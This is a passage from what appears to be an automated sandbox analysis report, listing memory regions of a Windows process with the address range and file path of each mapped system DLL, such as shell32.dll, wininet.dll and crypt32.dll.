	        filename = "\\PROGRA~1\\MICROS~2\\Office16\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~2\\office16\\grooveex.dll")

Region:
	              id = 391
	        start_va = 0x7ffc04490000
	          end_va = 0x7ffc0475dfff
	     entry_point = 0x7ffc04490000
	     region_type = mapped_file
	            name = "filesyncshell64.dll"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\OneDrive\\17.3.7294.0108\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\onedrive\\17.3.7294.0108\\amd64\\filesyncshell64.dll")

Region:
	              id = 392
	        start_va = 0x7ffc04760000
	          end_va = 0x7ffc0476cfff
	     entry_point = 0x7ffc04760000
	     region_type = mapped_file
	            name = "linkinfo.dll"
	        filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll")

Region:
	              id = 393
	        start_va = 0x7ffc04770000
	          end_va = 0x7ffc047bcfff
	     entry_point = 0x7ffc04770000
	     region_type = mapped_file
	            name = "thumbcache.dll"
	        filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll")

Region:
	              id = 394
	        start_va = 0x7ffc048e0000
	          end_va = 0x7ffc04905fff
	     entry_point = 0x7ffc048e0000
	     region_type = mapped_file
	            name = "srvcli.dll"
	        filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")

Region:
	              id = 395
	        start_va = 0x7ffc04910000
	          end_va = 0x7ffc049eafff
	     entry_point = 0x7ffc04910000
	     region_type = mapped_file
	            name = "ntshrui.dll"
	        filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll")

Region:
	              id = 396
	        start_va = 0x7ffc05560000
	          end_va = 0x7ffc055affff
	     entry_point = 0x7ffc05560000
	     region_type = mapped_file
	            name = "edputil.dll"
	        filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll")

Region:
	              id = 397
	        start_va = 0x7ffc055b0000
	          end_va = 0x7ffc05a4ffff
	     entry_point = 0x7ffc055b0000
	     region_type = mapped_file
	            name = "explorerframe.dll"
	        filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll")

Region:
	              id = 398
	        start_va = 0x7ffc05a50000
	          end_va = 0x7ffc05a99fff
	     entry_point = 0x7ffc05a50000
	     region_type = mapped_file
	            name = "dataexchange.dll"
	        filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll")

Region:
	              id = 399
	        start_va = 0x7ffc05ca0000
	          end_va = 0x7ffc05d50fff
	     entry_point = 0x7ffc05ca0000
	     region_type = mapped_file
	            name = "twinapi.dll"
	        filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll")

Region:
	              id = 400
	        start_va = 0x7ffc05d70000
	          end_va = 0x7ffc05d8efff
	     entry_point = 0x7ffc05d70000
	     region_type = mapped_file
	            name = "devdispitemprovider.dll"
	        filename = "\\Windows\\System32\\DevDispItemProvider.dll" (normalized: "c:\\windows\\system32\\devdispitemprovider.dll")

Region:
	              id = 401
	        start_va = 0x7ffc05e00000
	          end_va = 0x7ffc05e9bfff
	     entry_point = 0x7ffc05e00000
	     region_type = mapped_file
	            name = "msvcp140.dll"
	        filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll")

Region:
	              id = 402
	        start_va = 0x7ffc05ea0000
	          end_va = 0x7ffc05eb5fff
	     entry_point = 0x7ffc05ea0000
	     region_type = mapped_file
	            name = "vcruntime140.dll"
	        filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")

Region:
	              id = 403
	        start_va = 0x7ffc06410000
	          end_va = 0x7ffc06423fff
	     entry_point = 0x7ffc06410000
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 404
	        start_va = 0x7ffc06430000
	          end_va = 0x7ffc06525fff
	     entry_point = 0x7ffc06430000
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 405
	        start_va = 0x7ffc06700000
	          end_va = 0x7ffc0698dfff
	     entry_point = 0x7ffc06700000
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")

Region:
	              id = 406
	        start_va = 0x7ffc06b80000
	          end_va = 0x7ffc06b90fff
	     entry_point = 0x7ffc06b80000
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 407
	        start_va = 0x7ffc07e60000
	          end_va = 0x7ffc07edefff
	     entry_point = 0x7ffc07e60000
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 408
	        start_va = 0x7ffc07fd0000
	          end_va = 0x7ffc07fdbfff
	     entry_point = 0x7ffc07fd0000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")

Region:
	              id = 409
	        start_va = 0x7ffc08000000
	          end_va = 0x7ffc08009fff
	     entry_point = 0x7ffc08000000
	     region_type = mapped_file
	            name = "version.dll"
	        filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")

Region:
	              id = 410
	        start_va = 0x7ffc08010000
	          end_va = 0x7ffc081b8fff
	     entry_point = 0x7ffc08010000
	     region_type = mapped_file
	            name = "gdiplus.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll")

Region:
	              id = 411
	        start_va = 0x7ffc097b0000
	          end_va = 0x7ffc09a23fff
	     entry_point = 0x7ffc097b0000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 412
	        start_va = 0x7ffc09e90000
	          end_va = 0x7ffc09ecffff
	     entry_point = 0x7ffc09e90000
	     region_type = mapped_file
	            name = "netprofm.dll"
	        filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")

Region:
	              id = 413
	        start_va = 0x7ffc0a1a0000
	          end_va = 0x7ffc0a4d9fff
	     entry_point = 0x7ffc0a1a0000
	     region_type = mapped_file
	            name = "msi.dll"
	        filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")

Region:
	              id = 414
	        start_va = 0x7ffc0a4e0000
	          end_va = 0x7ffc0a563fff
	     entry_point = 0x7ffc0a4e0000
	     region_type = mapped_file
	            name = "winspool.drv"
	        filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")

Region:
	              id = 415
	        start_va = 0x7ffc0bae0000
	          end_va = 0x7ffc0baedfff
	     entry_point = 0x7ffc0bae0000
	     region_type = mapped_file
	            name = "npmproxy.dll"
	        filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")

Region:
	              id = 416
	        start_va = 0x7ffc0bfc0000
	          end_va = 0x7ffc0bfd1fff
	     entry_point = 0x7ffc0bfc0000
	     region_type = mapped_file
	            name = "cscapi.dll"
	        filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")

Region:
	              id = 417
	        start_va = 0x7ffc0bff0000
	          end_va = 0x7ffc0bffbfff
	     entry_point = 0x7ffc0bff0000
	     region_type = mapped_file
	            name = "davhlpr.dll"
	        filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")

Region:
	              id = 418
	        start_va = 0x7ffc0c000000
	          end_va = 0x7ffc0c01ffff
	     entry_point = 0x7ffc0c000000
	     region_type = mapped_file
	            name = "davclnt.dll"
	        filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll")

Region:
	              id = 419
	        start_va = 0x7ffc0c020000
	          end_va = 0x7ffc0c035fff
	     entry_point = 0x7ffc0c020000
	     region_type = mapped_file
	            name = "ntlanman.dll"
	        filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll")

Region:
	              id = 420
	        start_va = 0x7ffc0c040000
	          end_va = 0x7ffc0c04afff
	     entry_point = 0x7ffc0c040000
	     region_type = mapped_file
	            name = "drprov.dll"
	        filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll")

Region:
	              id = 421
	        start_va = 0x7ffc0c050000
	          end_va = 0x7ffc0c06afff
	     entry_point = 0x7ffc0c050000
	     region_type = mapped_file
	            name = "mpr.dll"
	        filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")

Region:
	              id = 422
	        start_va = 0x7ffc0c910000
	          end_va = 0x7ffc0c964fff
	     entry_point = 0x7ffc0c910000
	     region_type = mapped_file
	            name = "policymanager.dll"
	        filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")

Region:
	              id = 423
	        start_va = 0x7ffc0cb50000
	          end_va = 0x7ffc0cbdafff
	     entry_point = 0x7ffc0cb50000
	     region_type = mapped_file
	            name = "directmanipulation.dll"
	        filename = "\\Windows\\System32\\directmanipulation.dll" (normalized: "c:\\windows\\system32\\directmanipulation.dll")

Region:
	              id = 424
	        start_va = 0x7ffc0cc30000
	          end_va = 0x7ffc0cc38fff
	     entry_point = 0x7ffc0cc30000
	     region_type = mapped_file
	            name = "iconcodecservice.dll"
	        filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll")

Region:
	              id = 425
	        start_va = 0x7ffc0cde0000
	          end_va = 0x7ffc0ce89fff
	     entry_point = 0x7ffc0cde0000
	     region_type = mapped_file
	            name = "structuredquery.dll"
	        filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll")

Region:
	              id = 426
	        start_va = 0x7ffc0d190000
	          end_va = 0x7ffc0d314fff
	     entry_point = 0x7ffc0d190000
	     region_type = mapped_file
	            name = "windows.globalization.dll"
	        filename = "\\Windows\\System32\\Windows.Globalization.dll" (normalized: "c:\\windows\\system32\\windows.globalization.dll")

Region:
	              id = 427
	        start_va = 0x7ffc0d320000
	          end_va = 0x7ffc0d57ffff
	     entry_point = 0x7ffc0d320000
	     region_type = mapped_file
	            name = "dwrite.dll"
	        filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll")

Region:
	              id = 428
	        start_va = 0x7ffc0ed40000
	          end_va = 0x7ffc0edd7fff
	     entry_point = 0x7ffc0ed40000
	     region_type = mapped_file
	            name = "duser.dll"
	        filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll")

Region:
	              id = 429
	        start_va = 0x7ffc0f6f0000
	          end_va = 0x7ffc0f781fff
	     entry_point = 0x7ffc0f6f0000
	     region_type = mapped_file
	            name = "msvcp110_win.dll"
	        filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")

Region:
	              id = 430
	        start_va = 0x7ffc0f810000
	          end_va = 0x7ffc0f825fff
	     entry_point = 0x7ffc0f810000
	     region_type = mapped_file
	            name = "wkscli.dll"
	        filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")

Region:
	              id = 431
	        start_va = 0x7ffc0fa30000
	          end_va = 0x7ffc0fa9ffff
	     entry_point = 0x7ffc0fa30000
	     region_type = mapped_file
	            name = "mmdevapi.dll"
	        filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll")

Region:
	              id = 432
	        start_va = 0x7ffc0fad0000
	          end_va = 0x7ffc0fad6fff
	     entry_point = 0x7ffc0fad0000
	     region_type = mapped_file
	            name = "msimg32.dll"
	        filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll")

Region:
	              id = 433
	        start_va = 0x7ffc10110000
	          end_va = 0x7ffc101b0fff
	     entry_point = 0x7ffc10110000
	     region_type = mapped_file
	            name = "portabledeviceapi.dll"
	        filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll")

Region:
	              id = 434
	        start_va = 0x7ffc10420000
	          end_va = 0x7ffc10448fff
	     entry_point = 0x7ffc10420000
	     region_type = mapped_file
	            name = "cabinet.dll"
	        filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")

Region:
	              id = 435
	        start_va = 0x7ffc10450000
	          end_va = 0x7ffc10485fff
	     entry_point = 0x7ffc10450000
	     region_type = mapped_file
	            name = "xmllite.dll"
	        filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")

Region:
	              id = 436
	        start_va = 0x7ffc10490000
	          end_va = 0x7ffc109d4fff
	     entry_point = 0x7ffc10490000
	     region_type = mapped_file
	            name = "d2d1.dll"
	        filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll")

Region:
	              id = 437
	        start_va = 0x7ffc109e0000
	          end_va = 0x7ffc10c4efff
	     entry_point = 0x7ffc109e0000
	     region_type = mapped_file
	            name = "d3d10warp.dll"
	        filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll")

Region:
	              id = 438
	        start_va = 0x7ffc10d80000
	          end_va = 0x7ffc10f30fff
	     entry_point = 0x7ffc10d80000
	     region_type = mapped_file
	            name = "windowscodecs.dll"
	        filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")

Region:
	              id = 439
	        start_va = 0x7ffc11050000
	          end_va = 0x7ffc1107ffff
	     entry_point = 0x7ffc11050000
	     region_type = mapped_file
	            name = "globinputhost.dll"
	        filename = "\\Windows\\System32\\globinputhost.dll" (normalized: "c:\\windows\\system32\\globinputhost.dll")

Region:
	              id = 440
	        start_va = 0x7ffc110f0000
	          end_va = 0x7ffc11582fff
	     entry_point = 0x7ffc110f0000
	     region_type = mapped_file
	            name = "actxprxy.dll"
	        filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")

Region:
	              id = 441
	        start_va = 0x7ffc11590000
	          end_va = 0x7ffc115f6fff
	     entry_point = 0x7ffc11590000
	     region_type = mapped_file
	            name = "bcp47langs.dll"
	        filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll")

Region:
	              id = 442
	        start_va = 0x7ffc11690000
	          end_va = 0x7ffc11731fff
	     entry_point = 0x7ffc11690000
	     region_type = mapped_file
	            name = "dxgi.dll"
	        filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")

Region:
	              id = 443
	        start_va = 0x7ffc11740000
	          end_va = 0x7ffc119e7fff
	     entry_point = 0x7ffc11740000
	     region_type = mapped_file
	            name = "d3d11.dll"
	        filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll")

Region:
	              id = 444
	        start_va = 0x7ffc119f0000
	          end_va = 0x7ffc11a11fff
	     entry_point = 0x7ffc119f0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 445
	        start_va = 0x7ffc11b00000
	          end_va = 0x7ffc11be2fff
	     entry_point = 0x7ffc11b00000
	     region_type = mapped_file
	            name = "dcomp.dll"
	        filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll")

Region:
	              id = 446
	        start_va = 0x7ffc11ef0000
	          end_va = 0x7ffc12075fff
	     entry_point = 0x7ffc11ef0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 447
	        start_va = 0x7ffc120e0000
	          end_va = 0x7ffc120f2fff
	     entry_point = 0x7ffc120e0000
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 448
	        start_va = 0x7ffc12100000
	          end_va = 0x7ffc12124fff
	     entry_point = 0x7ffc12100000
	     region_type = mapped_file
	            name = "sppc.dll"
	        filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll")

Region:
	              id = 449
	        start_va = 0x7ffc12130000
	          end_va = 0x7ffc1215bfff
	     entry_point = 0x7ffc12130000
	     region_type = mapped_file
	            name = "winmmbase.dll"
	        filename = "\\Windows\\System32\\winmmbase.dll" (normalized: "c:\\windows\\system32\\winmmbase.dll")

Region:
	              id = 450
	        start_va = 0x7ffc12160000
	          end_va = 0x7ffc12184fff
	     entry_point = 0x7ffc12160000
	     region_type = mapped_file
	            name = "slc.dll"
	        filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")

Region:
	              id = 451
	        start_va = 0x7ffc12190000
	          end_va = 0x7ffc121b2fff
	     entry_point = 0x7ffc12190000
	     region_type = mapped_file
	            name = "winmm.dll"
	        filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll")

Region:
	              id = 452
	        start_va = 0x7ffc12300000
	          end_va = 0x7ffc12378fff
	     entry_point = 0x7ffc12300000
	     region_type = mapped_file
	            name = "apphelp.dll"
	        filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")

Region:
	              id = 453
	        start_va = 0x7ffc123a0000
	          end_va = 0x7ffc12435fff
	     entry_point = 0x7ffc123a0000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 454
	        start_va = 0x7ffc12440000
	          end_va = 0x7ffc12466fff
	     entry_point = 0x7ffc12440000
	     region_type = mapped_file
	            name = "devobj.dll"
	        filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")

Region:
	              id = 455
	        start_va = 0x7ffc12540000
	          end_va = 0x7ffc1263ffff
	     entry_point = 0x7ffc12540000
	     region_type = mapped_file
	            name = "twinapi.appcore.dll"
	        filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")

Region:
	              id = 456
	        start_va = 0x7ffc127a0000
	          end_va = 0x7ffc127d1fff
	     entry_point = 0x7ffc127a0000
	     region_type = mapped_file
	            name = "fwbase.dll"
	        filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")

Region:
	              id = 457
	        start_va = 0x7ffc12bc0000
	          end_va = 0x7ffc12cb3fff
	     entry_point = 0x7ffc12bc0000
	     region_type = mapped_file
	            name = "ucrtbase.dll"
	        filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")

Region:
	              id = 458
	        start_va = 0x7ffc12e30000
	          end_va = 0x7ffc12e3bfff
	     entry_point = 0x7ffc12e30000
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")

Region:
	              id = 459
	        start_va = 0x7ffc136a0000
	          end_va = 0x7ffc136ccfff
	     entry_point = 0x7ffc136a0000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")

Region:
	              id = 460
	        start_va = 0x7ffc13830000
	          end_va = 0x7ffc13885fff
	     entry_point = 0x7ffc13830000
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 461
	        start_va = 0x7ffc13950000
	          end_va = 0x7ffc13978fff
	     entry_point = 0x7ffc13950000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 462
	        start_va = 0x7ffc13a20000
	          end_va = 0x7ffc13a33fff
	     entry_point = 0x7ffc13a20000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 463
	        start_va = 0x7ffc13a40000
	          end_va = 0x7ffc13a8afff
	     entry_point = 0x7ffc13a40000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 464
	        start_va = 0x7ffc13a90000
	          end_va = 0x7ffc13a9ffff
	     entry_point = 0x7ffc13a90000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")

Region:
	              id = 465
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 466
	        start_va = 0x7ffc13b60000
	          end_va = 0x7ffc13be5fff
	     entry_point = 0x7ffc13b60000
	     region_type = mapped_file
	            name = "firewallapi.dll"
	        filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")

Region:
	              id = 467
	        start_va = 0x7ffc13bf0000
	          end_va = 0x7ffc13c44fff
	     entry_point = 0x7ffc13bf0000
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")

Region:
	              id = 468
	        start_va = 0x7ffc13c50000
	          end_va = 0x7ffc14293fff
	     entry_point = 0x7ffc13c50000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 469
	        start_va = 0x7ffc142a0000
	          end_va = 0x7ffc142b6fff
	     entry_point = 0x7ffc142a0000
	     region_type = mapped_file
	            name = "netapi32.dll"
	        filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")

Region:
	              id = 470
	        start_va = 0x7ffc142c0000
	          end_va = 0x7ffc14486fff
	     entry_point = 0x7ffc142c0000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")

Region:
	              id = 471
	        start_va = 0x7ffc14490000
	          end_va = 0x7ffc144d2fff
	     entry_point = 0x7ffc14490000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 472
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 473
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 474
	        start_va = 0x7ffc14740000
	          end_va = 0x7ffc147f4fff
	     entry_point = 0x7ffc14740000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 475
	        start_va = 0x7ffc14800000
	          end_va = 0x7ffc14942fff
	     entry_point = 0x7ffc14800000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 476
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 477
	        start_va = 0x7ffc14a70000
	          end_va = 0x7ffc15fcefff
	     entry_point = 0x7ffc14a70000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 478
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 479
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 480
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 481
	        start_va = 0x7ffc16550000
	          end_va = 0x7ffc165f6fff
	     entry_point = 0x7ffc16550000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 482
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 483
	        start_va = 0x7ffc166c0000
	          end_va = 0x7ffc167cafff
	     entry_point = 0x7ffc166c0000
	     region_type = mapped_file
	            name = "comdlg32.dll"
	        filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll")

Region:
	              id = 484
	        start_va = 0x7ffc167d0000
	          end_va = 0x7ffc1680afff
	     entry_point = 0x7ffc167d0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 485
	        start_va = 0x7ffc16810000
	          end_va = 0x7ffc16969fff
	     entry_point = 0x7ffc16810000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 486
	        start_va = 0x7ffc16970000
	          end_va = 0x7ffc169dafff
	     entry_point = 0x7ffc16970000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 487
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 488
	        start_va = 0x7ffc16b70000
	          end_va = 0x7ffc16f98fff
	     entry_point = 0x7ffc16b70000
	     region_type = mapped_file
	            name = "setupapi.dll"
	        filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")

Region:
	              id = 489
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 490
	        start_va = 0x7ffc17110000
	          end_va = 0x7ffc17116fff
	     entry_point = 0x7ffc17110000
	     region_type = mapped_file
	            name = "normaliz.dll"
